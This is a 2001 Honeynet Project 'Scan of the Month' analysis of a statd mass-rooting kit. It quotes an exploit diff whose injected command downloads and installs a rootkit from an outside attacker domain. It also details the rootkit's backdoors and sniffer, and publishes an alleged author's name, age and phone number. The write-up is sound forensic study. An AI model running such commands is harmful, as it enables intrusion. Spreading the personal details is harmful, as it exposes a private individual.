From niels.heinen@ubizen.com Sat Mar 17 20:02:25 2001 Date: Fri, 09 Mar 2001 18:17:43 +0100 From: Niels Heinen To: project@honeynet.org Subject: Scan of the month Hi all, I created this document for the scan of the month. I hope it's ok and you'll like it I had fun writing it tough ;)) Best regards Niels Heinen [ Part 1.2: "Attached Text" ] ------------------------------------------------------------------- -- Luckroot analysis -- ------------------------------------------------------------------- Before looking at the files themselves first I've tried to analyse the file names: luckgo --> looks like an shell script to fire up the others luckscan-a --> Statd scanner binary luckscan-a.c --> Statd scanner source luckstatdx --> Statd exploit binary luckstatdx.c --> Statd exploit source The luckgo file: ----------------- luckgo: Bourne shell script text As guessed above this appears to be a shell script which has been written to fire up the others in order to root web servers found in a class A network. The package is a mass hacking tool. Neato colors ;)) The luckscan-a file: --------------------- luckscan-a: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped Luck scan is an class A network scanner which scans for one port. The luckgo script executes this scanner to search for port 111 (portmap) to exploit the statd vulnerability in many *nix operating systems (especially redhat) Now if the scanner finds a host which has port 111 open then the scanner will execute luckstatdx to try and exploit that host. The luckstatdx file: luckstatdx: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped This is the most funny file ;) They claimed it was not ripped but in fact the exploit is based upon ronin's first statd exploit. This can be seen by many similar pieces of code and the usage *menu* is also pretty much the same. The exploit binds a root shell to port 39168 on the target system. In the scanner the exploit is executed with this command: ./luckstatdx -d 0 The -d flag means that they are using a hard coded target system and the 0 means that this target system is a Red Hat 6.2 system with the nfs-utils-0.1.6-2 package. The luckstatdx exploit has been modified. This was probably done on a windows system (damn "^M" carriage returns ;). Here is the diff of the 2 files. I had to remove the ^M's ( perl -i.old -npe 's/\r\n/\n/g' luckstatdx.c ) out of luckstatdx.c and the comments out of statdx.c from ronin: $ diff statdx.c luckstatdx.c 0a1 > 161c162 < fprintf(stderr, "statdx by ron1n \n"); --- > fprintf(stderr, "statdx modify by becys \n"); 186c187 < --- // Becys was modify herre some cmd. 188,189c189,190 < send(sockd, "cd /; ls -alF; id;\n", 19, 0); < --- > send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lame rk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); // Aici cred ca trebuie un exit. 249c250 < printf("OMG! You now have rpc.statd technique!@#$!\n"); --- > printf("You now have a new server rooted with rpc.statd technique and becys|ReSpEkT scan-h4x0r !\n"); 497c498 < printf("A timeout was expected. Attempting connection to shell..\n"); --- > printf("Hmm,maibe i can root it. Attempting connection to shell..\n"); 499c500 < printf("Failed\n"); --- > printf("Fucking shit,i cant,sorry.\n"); 511d511 < As you can see besides the comment changes the most important change is the line which executes command on the fresh hacked system: Old command: send(sockd, "cd /; ls -alF; id;\n", 19, 0); New command: send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); Here we can see that a rootkit called xzibit.tar.gz is retrieved from the hacked system. This rootkit replaces netstat, ps, top, ifconfig and hdparm. It installs linsniffer and sense which is a perl script that can be used to analyse the output generated by the linsniffer. The rootkit also places a ssh backdoor which listens to port 6969. If an http server is running on the server then the install script of the rootkit will try to install a backdoor CGI script. The script allows remote attackers to execute commands on the server and view the output of the commands. Files in the xzibit.tar.gz rootkit: install: Bourne shell script text. Install is the main installing script which replaces most files. becys.cgi: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped. This file is the CGI backdoor. hdparm: Bourne shell script text. This file executes the ssh (sshdu) backdoor and the sniffer (linsniffer) . The install script uses chattr +i to make sure noone can modify this file. ifconfig: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped. linsniffer: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped. Well known sniffer. The sniffer logs to a file called tcp.log. logclear: ASCII text. Log clear is a weird shell script which uses killal -9 to kill linsniffer. The script then removes the tcp.log files and restarts the sniffer. Funny is that #!/bin/sh is not included in this file (messy ;)) netstat: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped. This looks alot like the normal netstat but it's modified allright. When executed it will hide the ssh backdoor. ps: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped Modified ps binary. This ps will not show the ssh backdoor sl2: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped. This binary can be used for a denial of service attack. It has been ripped from the TFN toolkit. Part of the strings output: [JSignal Caught. Exiting Cleanly. [JSegmentation Violation Caught. Exiting Cleanly. Unknown host %s sendto Usage: %s srcaddr dstaddr low high If srcaddr is 0, random addresses will be used socket %i.%i.%i.%i High port must be greater than Low port. After a search on the above line "High port must be greater than Low port." I found this web page on GIAC: http://www.sans.org/y2k/TFN_toolkit.htm It describes the tool and also gives a strings output which looks the same. s: ASCII text. This file is the configuration file for the ssh backdoor server. ssh_host_key: data. SSH host key. ssh_random_seed: data. SSH Random seed file. sshdu: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), not stripped. SSH server. top: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses shared libs), stripped. Modified top. After all files are in place then an email is send to becys@becys.org with information about then new hacked system. This email includes the output of the following commands: hostname -f uname -a ifconfig | grep inet Now who's responsible: ------------------------ [nielsh@testlab nielsh]$ whois becys.org [whois.internic.net] Whois Server Version 1.3 Domain names in the .com, .net, and .org domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: BECYS.ORG Registrar: BULKREGISTER.COM, INC. Whois Server: whois.bulkregister.com Referral URL: www.bulkregister.com Name Server: NS.WEBSITESOURCE.COM Name Server: NS2.WEBSITESOURCE.COM Updated Date: 11-sep-2000 >>> Last update of whois database: Sat, 3 Mar 2001 08:34:32 EST <<< The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and Registrars. More more i need moooorrreeeee: [nielsh@testlab nielsh]$ whois becys.org@whois.bulkregister.com [whois.bulkregister.com] bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Domain Name: BECYS.ORG Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Phone- (979)862-9233 Fax- Technical Contact: Web Site Source, In info@websitesource.com Web Site Source, Inc. 2476 Bolsover, Suite 484 Houston, TX 77005-2518 US Phone- 713-667-2520 Fax- 800-863-6499 Record updated on 2000-09-11 00:00:00. Record created on 2000-09-11. Record expires on 2002-09-11. Database last updated on 2001-03-03 01:29:33 EST. Domain servers in listed order: NS.WEBSITESOURCE.COM 216.147.43.135 NS2.WEBSITESOURCE.COM 216.147.1.116 Now i think we atleast need a phone number. A little search reveals that the creator of this kit has a chip tuning kit for sell: http://www.rdsnet.ro/rds-bin/publicitate_detaliu?anunttype_id=1 And long live yahoo... his phone number is: 093837243 (Romania) Answers to the questions: --------------------------- 1.What is the blackhat attempting to do with his command line syntax? He is using the system to hack as much as possible other systems. He retrieves the mass hacking tool from he web site unpacks it and fires it up to several different networks. The hacker made some typo's this probably due to the excitement ;) 2.What does the tool accomplish? The tool will scan the large networks for systems that have port 111 open. If such systems are found then the tool tries to exploit them using the luckstatdx binary. 3.How does the tool work? In short: The masshacking tool scan's networks for systems that have port 111 open. If the port is open the scanner executes an exploit which will only work on Red Hat 6.2 (see above why) If the exploit succeeds then it will perform a couple commands on the system. The exploit retrieved a rootkit to the fresh hacked system and installs it. When this is done the hacker is notified by an email which contains information about the new hacked system. 4.Is this tool a worm, or would you classify it as something else? You might call this a semi-worm but it's not a complete worm. This because the hacker has to activate the scanner. 5.Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? The tool is not original. The files used such as the exploit and the scanner are ripped modified and glued togetter with shell script. 6. What information can you obtain about who is using or created the tool? I found his phone number. The domain is registered with the yahoo account called besys@yahoo.com. Now with a little research i found that this email address was used for selling an diesel tuning kit up a Romanian web site. The writer goes by the name: Dumitru Liviu Mihai and is 18 years old. He has a yahoo profile page that gave me this information: http://profiles.yahoo.com/becys. And oh... the creator is sooo busted ;)) Best regards, Niels Heinen [ Part 2, "S/MIME Cryptographic Signature" ] [ Application/X-PKCS7-SIGNATURE 4KB. ] [ Unable to print this part. ]